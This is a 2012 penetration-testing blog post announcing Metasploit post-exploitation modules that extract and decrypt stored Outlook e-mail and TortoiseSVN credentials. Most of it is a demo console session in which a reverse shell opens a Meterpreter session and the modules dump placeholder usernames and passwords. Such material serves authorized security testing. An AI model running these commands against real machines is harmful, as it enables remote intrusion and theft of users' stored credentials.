Tuesday, June 26, 2012 At 2:40PM
Post exploitation is a critical component of any penetration test. In support of such activities we’ve recently comitted a few updates to the post exploitation modules within Metasploit:
1) Microsoft Outlook Post Exploitation: This module extracts and decrypts credentials for stored e-mail accounts. This update contains better handling of outbound SMTP servers requiring authentication. This module has proven quite useful during numerous penetration tests.
2) TortoiseSVN Post Exploitation: This new module extracts and decrypts SVN credentails for stored accounts.
Such post modules can be utilized within Metasploit’s Meterpreter environment. Below demonstrates their use through a reverse shell.
msf > use exploit/multi/handler
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.2.15:4444
[*] Starting the payload handler…
[*] Sending stage (752128 bytes) to 192.168.2.5
[*] Meterpreter session 1 opened (192.168.2.15:4444 -> 192.168.2.5:28765)
meterpreter > run post/windows/gather/credentials/outlook
[*] Searching for Microsoft Outlook in Registry…
[*] Microsoft Outlook found in Registry…
[+] Account Found:
[*] Type: IMAP
[*] User Display Name: John Smith
[*] User E-mail Address: [email protected]
[*] User Name: [email protected]
[*] User Password: password123
[*] Incoming Mail Server (IMAP): imap.test.com
[*] IMAP Use SSL: Yes
[*] IMAP Port: 993
[*] Outgoing Mail Server (SMTP): smtp.test.com [Authentication Required]
[*] Outgoing Mail Server (SMTP) User Name: [email protected]
[*] Outgoing Mail Server (SMTP) Password: password123
[*] SMTP Use SSL: Yes
[*] SMTP Port: 587
[*]
[*] Complete
meterpreter > run post/windows/gather/credentials/tortoisesvn
[*] Searching for TortoiseSVN…
[*] Checking for configuration files in: C:UsersJohnAppDataRoamingSubversionauthsvn.simple
[+] Account Found:
[*] URL: https://svn.test.com:443
[*] Realm: SVN Server
[*] User Name: jsmith
[*] Password: password123
[*]
[*] Complete
Enjoy!
Author: Justin Cacak
©Aon plc 2023